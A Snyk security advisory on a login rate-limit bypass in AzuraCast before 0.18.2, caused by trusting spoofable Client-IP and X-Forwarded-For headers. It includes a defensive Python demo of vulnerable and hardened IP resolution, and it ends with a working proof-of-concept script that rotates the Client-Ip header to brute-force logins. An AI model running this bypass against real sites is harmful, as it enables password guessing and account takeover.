Brute Force Affecting azuracast/azuracast package, versions <0.18.2


Severity: high (Snyk)
Snyk CVSS: Attack Complexity Low
Threat Intelligence: Exploit Maturity Proof of concept; EPSS 0.1% (41st percentile)
NVD: 9.8 critical

  • Snyk ID SNYK-PHP-AZURACASTAZURACAST-5497341
  • published 5 May 2023
  • disclosed 5 May 2023
  • credit TsarSec

How to fix?

Upgrade azuracast/azuracast to version 0.18.2 or higher.

Overview

Affected versions of this package are vulnerable to Brute Force because the getIp() function consults request headers such as Client-IP or X-Forwarded-For before the actual remote address. Those headers are fully attacker-controlled, and the login rate limiter is keyed on the value getIp() returns, so an attacker who sends a fresh, arbitrary value in one of these headers on every request is counted as a new client each time and completely bypasses the rate-limiting on login attempts.
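To make the failure mode concrete, the following added example (written for this page, not AzuraCast's own getIp() or rate-limiter code) models both resolvers side by side: a get_ip_vulnerable() that prefers spoofable headers, and a get_ip_hardened() that only believes X-Forwarded-For when the TCP peer is a configured reverse proxy and then takes the address that proxy appended. A small login rate limiter keyed on the resolved address is driven through the same loops as the PoC below. The proxy address, the attacker address, the threshold of 5 and the header names are assumptions for the demo; the proxy is simulated inline.

```python
"""Added illustration of the rate-limit bypass: a limiter keyed on a spoofable
client IP versus one keyed on an IP resolved only from trusted proxies.
Example code for this page, not AzuraCast's implementation; all names,
addresses and the threshold below are assumptions."""
from collections import Counter
import ipaddress

LOGIN_LIMIT = 5                     # assumed: failed attempts allowed per client
PROXY_ADDR = "192.0.2.1"            # assumed address of a reverse proxy in front of the app

# Headers the vulnerable resolver consults, in order, before the socket address.
SPOOFABLE_HEADERS = ("Client-Ip", "X-Forwarded-For", "X-Real-Ip")


def get_ip_vulnerable(remote_addr, headers):
    """Mirrors the flaw: any of these headers wins over the real peer address,
    so the requester controls the value the rate limiter keys on."""
    for name in SPOOFABLE_HEADERS:
        value = headers.get(name)
        if value:
            return value.split(",")[0].strip()     # left-most hop: client-supplied
    return remote_addr


def get_ip_hardened(remote_addr, headers, trusted_proxies=()):
    """Trust X-Forwarded-For only when the TCP peer is a configured proxy, and
    then use the right-most hop, the one that proxy appended (assumes a single
    proxy layer; a chain would walk from the right past each trusted proxy)."""
    peer = ipaddress.ip_address(remote_addr)
    if not any(peer in ipaddress.ip_network(p) for p in trusted_proxies):
        return remote_addr                          # direct client: headers are untrusted
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    if not hops:
        return remote_addr
    try:
        return str(ipaddress.ip_address(hops[-1]))
    except ValueError:
        return remote_addr                          # garbage in the header: fall back to the peer


class LoginRateLimiter:
    """Counts failed logins per resolved address; blocks once LOGIN_LIMIT is reached."""

    def __init__(self, resolve_ip, limit=LOGIN_LIMIT, **resolver_kwargs):
        self.resolve_ip = resolve_ip
        self.limit = limit
        self.resolver_kwargs = resolver_kwargs
        self.failures = Counter()

    def attempt(self, remote_addr, headers):
        """Returns True if the attempt is processed, False if it is rate limited.
        Every processed attempt counts as a failed login in this demo."""
        key = self.resolve_ip(remote_addr, headers, **self.resolver_kwargs)
        if self.failures[key] >= self.limit:
            return False
        self.failures[key] += 1
        return True


def via_proxy(client_addr, headers):
    """Constructed stand-in for the reverse proxy: it appends the real client
    address to X-Forwarded-For and connects to the app from PROXY_ADDR."""
    forwarded = dict(headers)
    existing = forwarded.get("X-Forwarded-For")
    forwarded["X-Forwarded-For"] = f"{existing}, {client_addr}" if existing else client_addr
    return PROXY_ADDR, forwarded


def attempts_before_lockout(limiter, client_addr, spoof_header=None,
                            behind_proxy=False, max_tries=100):
    """Drive the PoC loop: how many attempts go through before one is blocked
    (max_tries means the limiter never triggered). With spoof_header set, each
    request carries a fresh value, exactly as the PoC does with Client-Ip."""
    for i in range(max_tries):
        headers = {spoof_header: f"10.0.0.{i}"} if spoof_header else {}   # valid while i < 256
        remote_addr = client_addr
        if behind_proxy:
            remote_addr, headers = via_proxy(client_addr, headers)
        if not limiter.attempt(remote_addr, headers):
            return i
    return max_tries


def run_demo():
    """Returns attempts-before-lockout for each scenario (constructed attacker address)."""
    attacker = "203.0.113.7"
    trusted = {"trusted_proxies": (PROXY_ADDR + "/32",)}
    return {
        "vulnerable, honest": attempts_before_lockout(
            LoginRateLimiter(get_ip_vulnerable), attacker),
        "vulnerable, spoofed Client-Ip": attempts_before_lockout(
            LoginRateLimiter(get_ip_vulnerable), attacker, spoof_header="Client-Ip"),
        "vulnerable behind proxy, spoofed X-Forwarded-For": attempts_before_lockout(
            LoginRateLimiter(get_ip_vulnerable), attacker,
            spoof_header="X-Forwarded-For", behind_proxy=True),
        "hardened, spoofed Client-Ip": attempts_before_lockout(
            LoginRateLimiter(get_ip_hardened), attacker, spoof_header="Client-Ip"),
        "hardened behind proxy, spoofed X-Forwarded-For": attempts_before_lockout(
            LoginRateLimiter(get_ip_hardened, **trusted), attacker,
            spoof_header="X-Forwarded-For", behind_proxy=True),
    }


if __name__ == "__main__":
    for scenario, tries in run_demo().items():
        print(f"{scenario}: {tries} attempts before lock-out")
```

The honest client is locked out after 5 attempts with either resolver, while the spoofing client runs all 100 attempts against the vulnerable resolver, both directly and through the proxy (which only appends to the header the attacker already controls the left-most entry of). The hardened resolver ignores the headers from a direct client and, behind the proxy, keys on the address the proxy appended, so the spoofed values never change the limiter's key.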

PoC

import requests
import sys

login_url = "http://localhost/login"
data = {"username": "root@localhost.local", "password": "xxx"}

# Baseline: repeated failed logins from a single address trip the rate limiter
for i in range(0, 100):
    print(i)
    r = requests.post(login_url, data=data)
    if "You have attempted" in r.text:
        print(f"hit rate limiting after {i} tries")
        break

# Now repeat with a different Client-Ip header on every request: getIp() keys
# the rate limiter on this attacker-chosen value, so the counter never
# accumulates and all 100 attempts go through without being blocked
for i in range(0, 100):
    print(i)
    headers = {"Client-Ip": str(i)}
    print(headers)
    r = requests.post(login_url, data=data, headers=headers)
    if "You have attempted" in r.text:
        print(f"hit rate limiting after {i} tries")
        sys.exit()
